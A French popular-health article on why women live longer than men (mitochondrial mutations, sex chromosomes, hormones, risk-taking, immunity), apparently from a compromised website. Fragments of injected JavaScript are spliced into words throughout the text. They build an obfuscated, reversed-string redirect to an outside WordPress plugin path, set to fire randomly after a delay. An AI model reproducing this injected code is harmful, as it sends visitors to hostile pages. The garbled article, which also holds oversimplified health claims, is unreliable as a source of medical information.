SANTESANTE POUR FEMMES

Les scientifiques révèlent pourquoi les femmes vivent plus longtemps que les hommes

Selon le Centre de contrôle et de prévention des maladies (CDC), les femmes vivent en moyenne 5 à 7 ans de plus que les hommes. Les hommes sont plus susceptibles d’atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopter des comportements à risque, des emplois dangereux, de se suicider ou de mourir de meurtre ou de maladies cardiaques.

Cependant, ce n’est pas la seule raison pour laquelle les femmes ont généralement une espérance de vie supérieure à celle des hommes. Outre la configuration biologique des hommes, de nombreux autres facteurs réduisent la durée de vie des hommes et des garçons par rapport aux femmes et aux filles. Nous examinons ici les principales raisons biologiques expliquant pourquoi les hommes ont une espérance de vie inférieure à celle des femmes.

Les mutations de l’ADN accélèrent le vieillissement de l’homme

Les hommes ont tendance à vieillir plus rapidement que les femmes. La raison en est la mutation du gène dans l’ADN de la mitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tochondrie chez l’homme. Les mitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tochondries se trouvent dans chaque cellule du corps sauf dans les globules rouges.

Ces organites ont leur propre ADN et peuvent fabriquer des protéines. Les scientifiques ont découvert que la mutation de la mitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tochondrie chez les hommes tend à les faire vieillir plus rapidement, alors que ce n’est pas le cas chez les femmes. Cela fait en moyenne que les hommes vieillissent plus vite que les femmes.

Mutations du chromosome sexuel

Les cellules sexuelles mâles et femelles contiennent un chromosome X ou Y. Les mâles ont une paire de chromosomes X et Y, ttoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andis que les femelles ne possèdent qu’une paire de chromosomes X. En cas de mutation du chromosome sexuel, les hommes et les femmes seront affectés différemment.

Les mutations génétiques survenant sur le chromosome X chez les hommes auront un effet sur leur vieillissement et seront exprimées. D’autre part, une mutation génétique sur le chromosome X chez les femmes n’aura aucun effet et sera masquée par l’allèle d’appariement, de sorte que la maladie ne sera pas exprimée chez les femmes.

Différences hormonales

La production d’hormones sexuelles a un effet sur la durée de vie des hommes et des femmes. Les hormones sexuelles sont essentielles au développement et à la croissance des organes sexuels. L’hormone masculine, la testoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tostérone, élève le niveau de mauvais cholestérol appelé cholestérol des lipoprotéines de basse densité (LDL), ce qui augmente le risque de maladie cardiaque et d’accident vasculaire cérébral. Cela favorise la formation de noir dans les artères.

L’hormone féminine d’œstrogène réduit la concentration de LDL et diminue toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc le risque de maladies cardiaques. Par conséquent, les hommes sont plus susceptibles de souffrir de maladies cardiaques que les femmes, ce qui augmente leur mortalité.

Vivre dangereusement

Les hommes ont tendance à vivre plus dangereusement et à se livrer à des actions violentes plus souvent. Ils prennent des risques énormes qui augmentent leur vulnérabilité aux accidents et à la mort. En ce qui concerne le respect de mesures de sécurité telles que le port de la ceinture de sécurité ou d’autres équipements de sécurité, elles sont plus susceptibles d’ignorer cette norme, ttoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andis que les femmes sont plus susceptibles de faire preuve de prudence.

Les hommes sont majoritairement victimes d’abus de drogues, d’alcoolisme, de terrorisme et d’autres comportements à risque. Les hommes sont plus enclins à prendre des risques énormes à cause de l’hormone de testoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tostérone, qui crée un sentiment exaltant associé à la prise de risques. En outre, la partie du cerveau associée à la prise de risques, le lobe frontal, est plus grtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}ande chez les hommes que chez les femmes.

Un déclin dans le système immunitaire

Le taux de déclin du système immunitaire des hommes est supérieur à celui des femmes. À un plus jeune âge, le nombre de globules blancs chez les hommes est supérieur à celui des femmes du même âge. Cependant, le taux de déclin des globules blancs est plus rapide chez les hommes que chez les femmes et, éventuellement, les femmes auront un nombre de lymphocytes plus élevé que les hommes à un certain âge.

Source: 24jours.com

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :